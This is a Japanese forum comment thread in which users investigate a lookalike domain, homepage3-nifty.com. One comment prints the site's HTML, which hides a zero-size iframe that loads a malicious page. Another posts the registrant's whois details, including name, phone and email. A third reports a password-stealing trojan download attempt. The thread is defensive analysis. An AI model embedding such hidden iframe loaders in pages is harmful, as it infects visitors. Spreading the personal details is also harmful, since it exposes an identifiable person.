アカウント名:
パスワード:
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
身近な人の偉大さは半減する -- あるアレゲ人
紛らわしいドメイン名 (スコア:0)
剥奪以前に、与えられないようにしてもらいたいものだが…
Re:紛らわしいドメイン名 (スコア:5, 参考になる)
で、VMware使って実際にそのサイトにアクセスしてみた。(パーソナル・ファイアーウォールやアンチウイルス・ソフトを
併用した上でのテストなので、怖いもの見たさで自分で試すときは注意してほしい)
いきなり中国語の言語パックをインストールするかどうかIEからのメッセージが出たのでキャンセルすると青バックの
画面だけで何も表示されない。
青バック画面のソースは下記のとおり。
content="zh-cn" とか、charset=gb2312 とか、 name="zhu" とかあるから中国人/中国人留学生の作のようだ。
<html>
<head>
<meta http-equiv="Content-Language" content="zh-cn">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title></title>
</head>
<body bgcolor="#9CCCFF" topmargin="80" leftmargin="0">
<p align="center"><img border="0" src="img.gif" width="0" height="0"></p>
<iframe src="httP://www.homepage3-nifty.com/online/admin.htm" name="zhu" width="0" height="0" frameborder="0"></body>
</html>
Re:紛らわしいドメイン名 (スコア:5, 参考になる)
Domain Name ..................... homepage3-nifty.com
Name Server ..................... ns1.dnsfamily.com
ns2.dnsfamily.com
Registrant ID ................... hc343410609-cn
Registrant Name ................. lin zhiqiang
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 364000
Registrant Country Code ......... CN
Registrant Phone Number ......... +86.05973289053 -
Registrant Fax .................. +86.05973289053 -
Registrant Email ................ mail@pcinc.cn
長いので省略
Re:紛らわしいドメイン名 (スコア:5, 参考になる)
実験用に飼っているので全くセキュリティパッチは当てていません。
するとブルーバックの画面が表示されたのでしばらく待ってみたところ、ホスト側(WinXP)のNOD32(2.7)のIMONが反応しました。
NOD32の報告によるとWin32/PSW.MaranというTrojanの亜種をインストールしようとしてきたようです。
ファイル名は/svch.exe
ググってみたところTR/PSW.Maran.G.5 [avira.com]
の情報が引っかかりました。
これと同系統なTrojanの亜種とすると情報を送信するオーソドックスなタイプのTrojanのようです。